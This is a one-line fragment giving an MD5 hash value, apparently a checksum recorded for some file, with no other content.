    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1